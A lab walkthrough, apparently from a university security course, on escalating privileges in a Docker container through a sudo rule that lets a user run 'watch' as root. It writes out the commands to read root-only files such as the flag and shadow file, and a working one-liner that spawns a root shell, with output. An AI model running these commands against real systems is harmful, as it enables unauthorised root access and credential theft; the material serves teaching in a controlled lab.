Skip to content

Walk through: Using Limited Sudo rights to escalate privileges.

For the walk though we are going to take advantage of a misconfigured file to grab the contents of the flag. While we have a specific example, you can use the same approach to try to discover privesc on any target system.

The Challenge is in the 245_Labs git repo under /Week4_Privec/SudoDemo

Starting the Container

First we need to start the container using docker-compose:

$ docker-compose up        ✭main 
Starting sudodemo_ssh_1 ... done
Attaching to sudodemo_ssh_1
ssh_1  | ==============================================================
ssh_1  | |                                                            |
ssh_1  | |                                                            |
ssh_1  | |   SSH Service Started:                                     |
ssh_1  | |                                                            |
ssh_1  | |                 Username:  cueh                            |
ssh_1  | |                 Password:  cueh                            |
ssh_1  | |                                                            |
ssh_1  | |   IP address For SSH is 192.168.144.2                          |
ssh_1  | |                                                            |
ssh_1  | |                                                            |
ssh_1  | |  Connect with: ssh cueh@192.168.144.2                          |
ssh_1  | |                                                            |
ssh_1  | ==============================================================

Connecting to the Challenge

We can then connect from another terminal window using SSH.

$ssh cueh@172.17.0.3
cueh@172.17.0.3's password: 
Linux f4a8c9bcd0e8 5.0.9-arch1-1-ARCH #1 SMP PREEMPT Sat Apr 20 15:00:46 UTC 2019 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cueh@f4a8c9bcd0e8:~$

Normally, we would try to find exploitable files through systems enumeration. A good place to start here is seeing what files the user has access to and the things they can run.

ls -l

shows us there is nothing interesting in the users home directory. Lets see see if we have sudo rights for anything

cueh@f4a8c9bcd0e8:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for cueh: 
Matching Defaults entries for cueh on f4a8c9bcd0e8:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cueh may run the following commands on f4a8c9bcd0e8:
    (root) /usr/bin/watch, /sbin/poweroff
cueh@f4a8c9bcd0e8:~$

So looking through the command list we have two commands that we can use Sudo rights for:

  • Watch: Watch - execute a program periodically, showing output full screen

Taking a look on GTFObins shows us that the watch command is indeed exploitable with sudo privileges

Lets have a quick think about what watch allows us to do. We can run a command, then pipe its output to stdout. Therefore by giving watch Sudo rights, we can actually run any command as sudo, as it will inherit the privileges of watch.

Simply Reading the Flag File

There are two ways we can get the flag here, Lets take an easy example first:

We know of several command that can output the contents of a file to the command line, for example cat. As watch will show the output of a command perhaps we can abuse this to display the flag.

The command we need to run would be cat /root/root.txt although we get the permissions issue as we are trying to access a file we don't own.

cueh@f4a8c9bcd0e8:~$ cat /root/root.txt
cat: /root/root.txt: Permission denied

So, using watch with sudo, will give cat root privileges so we can then access the file

cueh@f4a8c9bcd0e8:~$ sudo watch cat /root/root.txt

Which gives us the contents of the flag..

Every 2.0s: cat /root/root.txt    f4a8c9bcd0e8: Wed May  8 13:23:15 2019

245CT{...flag redacted ...}

Note

We can actually access any file on the system with this, including shadow etc

Upgrading from Read access to a Shell.

While its pretty cool to be able to read a file using the root privilges, reading data is still limited. Sometimes it can be possible to use the vulnerable binary to get a root shell. This could be considerd the ultimate goal, as it gives up access to every part of the system.

OK, so we are using watch to view the file, can we upgrade it to a shell? This time we follow the suggestion on GTFO Bins.

watch -x sh -c 'reset; exec sh 1>&0 2>&0'

Trying this gives us a fully functional root shell, which we can use to access the flag.

cueh@f4a8c9bcd0e8:~$ sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'
# id
uid=0(root) gid=0(root) groups=0(root)
# 
# cat /root/root.txt
245CT{... REDACTED ...}
#

Video

Your Turn

Easytask

Work through the walk through and get the genuine flag.

Task

There is a second sudo based privesc available at in the Sudo_Challenge_1 directory work through the process and find the flag.

HINTS: - Think about the commands your are available, what does this command allow us to do - You may need to take two steps to get the root shell.

Back to top